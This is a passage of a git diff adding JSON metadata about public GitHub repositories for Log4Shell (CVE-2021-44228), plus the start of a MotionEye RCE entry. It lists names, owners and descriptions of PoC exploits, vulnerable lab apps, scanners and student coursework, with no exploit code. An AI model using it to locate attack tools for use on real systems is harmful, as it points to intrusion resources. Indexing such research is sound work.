"https:\/\/github.com\/bcdunbar\/CVE-2021-44228-poc", + "description": "CVE-2021-44228 POC \/ Example", + "fork": false, + "created_at": "2022-09-21T20:33:06Z", + "updated_at": "2022-09-29T22:57:36Z", + "pushed_at": "2022-09-29T22:57:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563424783, + "name": "CVE-2021-44228", + "full_name": "srcporter\/CVE-2021-44228", + "owner": { + "login": "srcporter", + "id": 42175824, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42175824?v=4", + "html_url": "https:\/\/github.com\/srcporter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/srcporter\/CVE-2021-44228", + "description": "DO NOT USE FOR ANYTHING REAL. Simple springboot sample app with vulnerability CVE-2021-44228 aka \"Log4Shell\" ", + "fork": false, + "created_at": "2022-11-08T15:29:42Z", + "updated_at": "2024-08-22T18:40:38Z", + "pushed_at": "2024-08-22T18:40:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 583519721, + "name": "log4j2_CVE-2021-44228", + "full_name": "Nexolanta\/log4j2_CVE-2021-44228", + "owner": { + "login": "Nexolanta", + "id": 73454853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73454853?v=4", + "html_url": "https:\/\/github.com\/Nexolanta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nexolanta\/log4j2_CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2022-12-30T02:46:33Z", + "updated_at": "2022-12-30T02:54:02Z", + "pushed_at": "2022-12-30T02:48:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 595794114, + "name": "Log4j-Vulnerability", + "full_name": "demining\/Log4j-Vulnerability", + "owner": { + "login": "demining", + "id": 87700947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87700947?v=4", + "html_url": "https:\/\/github.com\/demining", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/demining\/Log4j-Vulnerability", + "description": "Vulnerability CVE-2021-44228 allows remote code execution without authentication for several versions of Apache Log4j2 (Log4Shell). Attackers can exploit vulnerable servers by connecting over any protocol, such as HTTPS, and sending a specially crafted string.", + "fork": false, + "created_at": "2023-01-31T20:29:26Z", + "updated_at": "2024-08-12T20:29:35Z", + "pushed_at": "2023-01-31T20:35:59Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "bitcoin", + "blockchain", + "cve-2021-44228", + "hack", + "hacking", + "log4j", + "log4js", + "log4shell", + "mining", + "vulnerability", + "vulnerability-scanner", + "vulnerable" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 599082211, + "name": "Log4Shell-CVE-2021-44228-PoC", + "full_name": "pierpaolosestito-dev\/Log4Shell-CVE-2021-44228-PoC", + "owner": { + "login": "pierpaolosestito-dev", + "id": 112246529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112246529?v=4", + "html_url": "https:\/\/github.com\/pierpaolosestito-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pierpaolosestito-dev\/Log4Shell-CVE-2021-44228-PoC", + "description": "CVE 2021-44228 Proof-of-Concept. Log4Shell is an attack against Servers that uses vulnerable versions of Log4J. ", + "fork": false, + "created_at": "2023-02-08T12:19:32Z", + "updated_at": "2024-03-25T10:24:18Z", + "pushed_at": "2023-02-08T12:20:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attack", + "java", + "jndi-exploit", + "jndi-lookups", + "ldap", + "log4j-rce", + "security", + "vulnerabilities" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605052737, + "name": "LOG4J-CVE-2021-44228", + "full_name": "Sumitpathania03\/LOG4J-CVE-2021-44228", + "owner": { + "login": "Sumitpathania03", + "id": 126046383, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126046383?v=4", + "html_url": "https:\/\/github.com\/Sumitpathania03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sumitpathania03\/LOG4J-CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2023-02-22T10:45:46Z", + "updated_at": "2024-11-26T09:46:55Z", + "pushed_at": "2023-04-11T09:21:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614031542, + "name": "Log4j-PoC", + "full_name": "Sma-Das\/Log4j-PoC", + "owner": { + "login": "Sma-Das", + "id": 20164942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20164942?v=4", + "html_url": "https:\/\/github.com\/Sma-Das", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sma-Das\/Log4j-PoC", + "description": "An educational Proof of Concept for the Log4j Vulnerability (CVE-2021-44228) in Minecraft", + "fork": false, + "created_at": "2023-03-14T18:49:36Z", + "updated_at": "2023-08-15T12:50:40Z", + "pushed_at": "2023-03-14T18:50:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "gradle", + "java", + "log4j", + "log4j2", + "minecraft", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616502386, + "name": "log4shell-vulnweb", + "full_name": "53buahapel\/log4shell-vulnweb", + "owner": { + "login": "53buahapel", + "id": 55012507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55012507?v=4", + "html_url": "https:\/\/github.com\/53buahapel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/53buahapel\/log4shell-vulnweb", + "description": "this web is vulnerable against CVE-2021-44228", + "fork": false, + "created_at": "2023-03-20T14:09:30Z", + "updated_at": "2023-06-17T19:43:29Z", + "pushed_at": "2023-04-03T19:33:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622718899, + "name": "Log4ShellRemediation", + "full_name": "demonrvm\/Log4ShellRemediation", + "owner": { + "login": "demonrvm", + "id": 129688147, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129688147?v=4", + "html_url": "https:\/\/github.com\/demonrvm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/demonrvm\/Log4ShellRemediation", + "description": "A vulnerable Spring Boot application that uses log4j and is vulnerable to CVE-2021-44228, CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105", + "fork": false, + "created_at": "2023-04-02T23:03:28Z", + "updated_at": "2023-04-17T15:19:43Z", + "pushed_at": "2023-04-04T00:04:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 628273977, + "name": "log4j-exploit-fork-bomb", + "full_name": "funcid\/log4j-exploit-fork-bomb", + "owner": { + "login": "funcid", + "id": 42806772, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42806772?v=4", + "html_url": "https:\/\/github.com\/funcid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/funcid\/log4j-exploit-fork-bomb", + "description": "💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228", + "fork": false, + "created_at": "2023-04-15T12:47:39Z", + "updated_at": "2023-05-06T18:26:50Z", + "pushed_at": "2023-05-02T21:46:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 660080340, + "name": "PY-Log4j-RCE-Scanner", + "full_name": "MrHarshvardhan\/PY-Log4j-RCE-Scanner", + "owner": { + "login": "MrHarshvardhan", + "id": 49817411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49817411?v=4", + "html_url": "https:\/\/github.com\/MrHarshvardhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrHarshvardhan\/PY-Log4j-RCE-Scanner", + "description": "Using this tool, you can scan for remote command execution vulnerability CVE-2021-44228 on Apache Log4j at multiple addresses.", + "fork": false, + "created_at": "2023-06-29T07:46:40Z", + "updated_at": "2024-03-11T16:09:06Z", + "pushed_at": "2023-06-29T08:14:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 668405235, + "name": "Log4j_CVE-2021-44228", + "full_name": "Muhammad-Ali007\/Log4j_CVE-2021-44228", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/Log4j_CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2023-07-19T18:18:16Z", + "updated_at": "2023-07-21T21:40:52Z", + "pushed_at": "2023-07-21T21:55:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 701169649, + "name": "CVE-2021-44228", + "full_name": "Tai-e\/CVE-2021-44228", + "owner": { + "login": "Tai-e", + "id": 100122463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100122463?v=4", + "html_url": "https:\/\/github.com\/Tai-e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tai-e\/CVE-2021-44228", + "description": "Utilize Tai-e to identify the Log4shell (a.k.a. CVE-2021-44228) Vulnerability", + "fork": false, + "created_at": "2023-10-06T04:36:31Z", + "updated_at": "2024-11-07T04:36:16Z", + "pushed_at": "2023-10-06T09:30:27Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "java", + "log4shell", + "security", + "taint-analysis" + ], + "visibility": "public", + "forks": 1, + "watchers": 9, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 718233980, + "name": "CVE-2021-44228", + "full_name": "LucasPDiniz\/CVE-2021-44228", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2021-44228", + "description": "Log4j Vulnerability RCE - CVE-2021-44228", + "fork": false, + "created_at": "2023-11-13T16:57:22Z", + "updated_at": "2024-06-30T21:52:24Z", + "pushed_at": "2024-06-30T21:52:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021", + "cve-2021-44228", + "log4j", + "rce", + "solaris", + "solr", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 721701932, + "name": "log4shell-minecraft-demo", + "full_name": "felixslama\/log4shell-minecraft-demo", + "owner": { + "login": "felixslama", + "id": 79058712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79058712?v=4", + "html_url": "https:\/\/github.com\/felixslama", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/felixslama\/log4shell-minecraft-demo", + "description": "Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs", + "fork": false, + "created_at": "2023-11-21T15:45:31Z", + "updated_at": "2023-11-21T18:27:18Z", + "pushed_at": "2023-11-21T18:30:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 725731160, + "name": "log4shell_lab", + "full_name": "ShlomiRex\/log4shell_lab", + "owner": { + "login": "ShlomiRex", + "id": 17744127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17744127?v=4", + "html_url": "https:\/\/github.com\/ShlomiRex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShlomiRex\/log4shell_lab", + "description": "CVE-2021-44228", + "fork": false, + "created_at": "2023-11-30T18:55:40Z", + "updated_at": "2024-07-15T07:35:10Z", + "pushed_at": "2024-07-15T07:35:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728564712, + "name": "CVE-Lab", + "full_name": "dcm2406\/CVE-Lab", + "owner": { + "login": "dcm2406", + "id": 106772368, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106772368?v=4", + "html_url": "https:\/\/github.com\/dcm2406", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcm2406\/CVE-Lab", + "description": "Instructions for exploiting vulnerabilities CVE-2021-44228 and CVE-2023-46604", + "fork": false, + "created_at": "2023-12-07T08:02:53Z", + "updated_at": "2024-03-21T06:45:44Z", + "pushed_at": "2024-03-20T06:20:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 732890890, + "name": "l4j-tp1", + "full_name": "scabench\/l4j-tp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/l4j-tp1", + "description": "jee web project with log4shell (CVE-2021-44228) vulnerability", + "fork": false, + "created_at": "2023-12-18T05:07:59Z", + "updated_at": "2023-12-27T22:59:23Z", + "pushed_at": "2024-01-09T04:10:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736198962, + "name": "l4j-fp1", + "full_name": "scabench\/l4j-fp1", + "owner": { + "login": "scabench", + "id": 154115874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154115874?v=4", + "html_url": "https:\/\/github.com\/scabench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scabench\/l4j-fp1", + "description": "jee web project with sanitised log4shell (CVE-2021-44228) vulnerability", + "fork": false, + "created_at": "2023-12-27T08:49:38Z", + "updated_at": "2023-12-27T22:59:37Z", + "pushed_at": "2024-01-14T23:40:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 772721921, + "name": "l4s-vulnapp", + "full_name": "KtokKawu\/l4s-vulnapp", + "owner": { + "login": "KtokKawu", + "id": 16015720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16015720?v=4", + "html_url": "https:\/\/github.com\/KtokKawu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KtokKawu\/l4s-vulnapp", + "description": "This is a potentially vulnerable Java web application containing Log4j affected by log4shell(CVE-2021-44228).", + "fork": false, + "created_at": "2024-03-15T18:57:11Z", + "updated_at": "2024-03-15T19:37:44Z", + "pushed_at": "2024-03-15T19:37:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 776289709, + "name": "CVE-2021-44228-POC", + "full_name": "sec13b\/CVE-2021-44228-POC", + "owner": { + "login": "sec13b", + "id": 123419537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123419537?v=4", + "html_url": "https:\/\/github.com\/sec13b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sec13b\/CVE-2021-44228-POC", + "description": "exploit CVE-2021-44228 ", + "fork": false, + "created_at": "2024-03-23T05:03:44Z", + "updated_at": "2024-11-06T18:16:06Z", + "pushed_at": "2024-11-06T18:16:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 777920527, + "name": "Wireshark", + "full_name": "KirkDJohnson\/Wireshark", + "owner": { + "login": "KirkDJohnson", + "id": 164972007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164972007?v=4", + "html_url": "https:\/\/github.com\/KirkDJohnson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KirkDJohnson\/Wireshark", + "description": "Downloaded a packet capture (.pcapng) file from malware-traffic-analysis.net which was an example of an attempted attack against a webserver using the Log4J vulnerability (CVE-2021-44228). I examined teh amount of endpoints communicating with the server and knowing jnidi as a common in the vulnerbilty found it in clear text", + "fork": false, + "created_at": "2024-03-26T18:47:20Z", + "updated_at": "2024-09-14T11:49:45Z", + "pushed_at": "2024-05-22T23:57:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 780990164, + "name": "LOGJ4_PocShell_CVE-2021-44228", + "full_name": "YangHyperData\/LOGJ4_PocShell_CVE-2021-44228", + "owner": { + "login": "YangHyperData", + "id": 131573711, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131573711?v=4", + "html_url": "https:\/\/github.com\/YangHyperData", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YangHyperData\/LOGJ4_PocShell_CVE-2021-44228", + "description": null, + "fork": false, + "created_at": "2024-04-02T14:44:10Z", + "updated_at": "2024-07-04T13:20:01Z", + "pushed_at": "2024-07-04T13:19:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807102558, + "name": "CVE-2021-44228-demo", + "full_name": "Hoanle396\/CVE-2021-44228-demo", + "owner": { + "login": "Hoanle396", + "id": 89791546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89791546?v=4", + "html_url": "https:\/\/github.com\/Hoanle396", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hoanle396\/CVE-2021-44228-demo", + "description": null, + "fork": false, + "created_at": "2024-05-28T13:40:20Z", + "updated_at": "2024-05-28T13:43:00Z", + "pushed_at": "2024-05-28T13:42:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812482563, + "name": "Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment", + "full_name": "tadash10\/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment", + "owner": { + "login": "tadash10", + "id": 126980610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126980610?v=4", + "html_url": "https:\/\/github.com\/tadash10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tadash10\/Exploiting-CVE-2021-44228-Log4Shell-in-a-Banking-Environment", + "description": "Objective: Demonstrate the exploitation of the Log4Shell vulnerability (CVE-2021-44228) within a simulated banking application environment.", + "fork": false, + "created_at": "2024-06-09T02:49:42Z", + "updated_at": "2024-08-25T03:41:02Z", + "pushed_at": "2024-06-14T02:52:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815657442, + "name": "cve-2021-44228", + "full_name": "cve-2021-44228\/cve-2021-44228", + "owner": { + "login": "cve-2021-44228", + "id": 66845682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66845682?v=4", + "html_url": "https:\/\/github.com\/cve-2021-44228", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2021-44228\/cve-2021-44228", + "description": null, + "fork": false, + "created_at": "2024-06-15T18:39:23Z", + "updated_at": "2024-11-24T04:49:40Z", + "pushed_at": "2024-11-24T04:49:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 834267924, + "name": "CVE-2021-44228", + "full_name": "asd58584388\/CVE-2021-44228", + "owner": { + "login": "asd58584388", + "id": 43491476, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43491476?v=4", + "html_url": "https:\/\/github.com\/asd58584388", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asd58584388\/CVE-2021-44228", + "description": "CVE-2021-44228 vulnerability study", + "fork": false, + "created_at": "2024-07-26T19:59:47Z", + "updated_at": "2024-07-26T20:57:53Z", + "pushed_at": "2024-07-26T20:57:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855503144, + "name": "CVE-2021-44228-Log4Shell-", + "full_name": "OtisSymbos\/CVE-2021-44228-Log4Shell-", + "owner": { + "login": "OtisSymbos", + "id": 78093502, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78093502?v=4", + "html_url": "https:\/\/github.com\/OtisSymbos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OtisSymbos\/CVE-2021-44228-Log4Shell-", + "description": null, + "fork": false, + "created_at": "2024-09-11T01:13:35Z", + "updated_at": "2024-09-11T01:20:42Z", + "pushed_at": "2024-09-11T01:14:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855573158, + "name": "log4j-shell-poc", + "full_name": "safeer-accuknox\/log4j-shell-poc", + "owner": { + "login": "safeer-accuknox", + "id": 180378107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180378107?v=4", + "html_url": "https:\/\/github.com\/safeer-accuknox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safeer-accuknox\/log4j-shell-poc", + "description": "Log4J exploit CVE-2021-44228", + "fork": false, + "created_at": "2024-09-11T05:06:50Z", + "updated_at": "2024-09-11T09:39:58Z", + "pushed_at": "2024-09-11T09:39:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869690102, + "name": "TPASLog4ShellPoC", + "full_name": "Carlos-Mesquita\/TPASLog4ShellPoC", + "owner": { + "login": "Carlos-Mesquita", + "id": 75860783, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75860783?v=4", + "html_url": "https:\/\/github.com\/Carlos-Mesquita", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Carlos-Mesquita\/TPASLog4ShellPoC", + "description": "Proof of Concept (PoC) for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricular unit TPAS in the Master's degree in Information Security at FCUP.", + "fork": false, + "created_at": "2024-10-08T18:07:21Z", + "updated_at": "2024-10-10T14:53:56Z", + "pushed_at": "2024-10-08T18:19:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 886209908, + "name": "-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-", + "full_name": "AhmedMansour93\/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/-Unveiling-the-Lessons-from-Log4Shell-A-Wake-Up-Call-for-Cybersecurity-", + "description": "In December 2021, the world of cybersecurity was shaken by the discovery of the Log4Shell vulnerability (CVE-2021-44228), embedded within the widely-used Apache Log4j library. With a CVSS score of 10", + "fork": false, + "created_at": "2024-11-10T13:45:59Z", + "updated_at": "2024-11-10T13:47:01Z", + "pushed_at": "2024-11-10T13:46:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888768773, + "name": "cve-2021-44228", + "full_name": "Super-Binary\/cve-2021-44228", + "owner": { + "login": "Super-Binary", + "id": 188337454, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188337454?v=4", + "html_url": "https:\/\/github.com\/Super-Binary", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Super-Binary\/cve-2021-44228", + "description": "这是安徽大学 “漏洞分析实验”(大三秋冬)期中作业归档。完整文档位于https:\/\/testgames.me\/2024\/11\/10\/cve-2021-44228\/", + "fork": false, + "created_at": "2024-11-15T01:11:25Z", + "updated_at": "2024-11-23T13:31:31Z", + "pushed_at": "2024-11-23T13:31:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44255.json b/2021/CVE-2021-44255.json new file mode 100644 index 0000000000..85a5a3db2e --- /dev/null +++ b/2021/CVE-2021-44255.json @@ -0,0 +1,33 @@ +[ + { + "id": 420164946, + "name": "motioneye-authenticated-RCE", + "full_name": "pizza-power\/motioneye-authenticated-RCE", + "owner": { + "login": "pizza-power", + "id": 6135659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4", + "html_url": "https:\/\/github.com\/pizza-power", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pizza-power\/motioneye-authenticated-RCE", + "description": "A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. CVE-2021-44255", + "fork": false, + "created_at": "2021-10-22T16:15:08Z", + "updated_at": 